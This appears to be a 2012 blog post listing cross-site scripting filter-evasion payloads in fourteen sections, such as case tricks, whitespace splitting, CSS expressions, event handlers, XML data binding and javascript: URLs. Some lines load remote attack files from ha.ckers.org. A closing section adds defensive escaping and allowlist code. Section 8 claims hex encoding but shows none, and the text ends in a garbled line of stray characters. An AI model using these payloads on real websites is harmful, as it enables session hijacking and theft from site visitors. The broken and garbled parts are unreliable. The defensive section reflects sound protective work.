Introduction to Cross Site Scripting (XSS) Attack Techniques

Posted on 2012-12-31 09:59:28
1. Change the character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace .js with another file extension

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade (the gaps inside "javascript" below are the tab or newline characters)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script inside an HTML tag (event handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart, then reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie through META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
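The common thread of the fourteen tricks above is that they all defeat a blacklist that looks for one exact spelling. The following is an added example, not code from the original post, showing on the defending side why that fails and what to do instead: escape untrusted text for the HTML context, allowlist attribute names so event handlers and data binding never pass, and for URL-valued attributes undo the tab/newline and entity tricks before checking the scheme. The function names (naiveFilter, escapeHtml, isAllowedAttribute, isSafeUrl) are hypothetical.

```javascript
// Added example; not part of the original post.

// The kind of exact-case blacklist these payloads are written against.
function naiveFilter(input) {
  return input.replace(/<script>/g, "");
}

// Escape the characters that change meaning in HTML text or attribute values.
// Case tricks, extra characters and split tags all stay inert as text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute allowlist for user-supplied markup: event handlers (section 9),
// DATASRC-style data binding (section 11) and STYLE (sections 7, 8) never pass.
const ALLOWED_ATTRS = new Set(["src", "href", "alt", "title", "class"]);
function isAllowedAttribute(name) {
  return ALLOWED_ATTRS.has(name.toLowerCase());
}

// Decide whether a URL-valued attribute may be emitted. Mirror what a browser
// does before it reads the scheme: decode numeric HTML entities, drop leading
// control characters and spaces, remove embedded tab/LF/CR (sections 6, 8, 14),
// then allow only relative URLs and http(s).
function isSafeUrl(url) {
  const decoded = url
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  const cleaned = decoded
    .replace(/^[\u0000-\u0020]+/, "")
    .replace(/[\t\n\r]/g, "")
    .toLowerCase();
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  if (!scheme) return true; // no scheme: a relative URL such as t.js
  return scheme[1] === "http" || scheme[1] === "https";
}
```

The blacklist leaves the section 1 payload untouched, while escapeHtml turns it into harmless text and isSafeUrl rejects every javascript: variant from sections 6, 8 and 14 regardless of case, whitespace or entity encoding.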
' d! K! _0 h( G3 M  b! }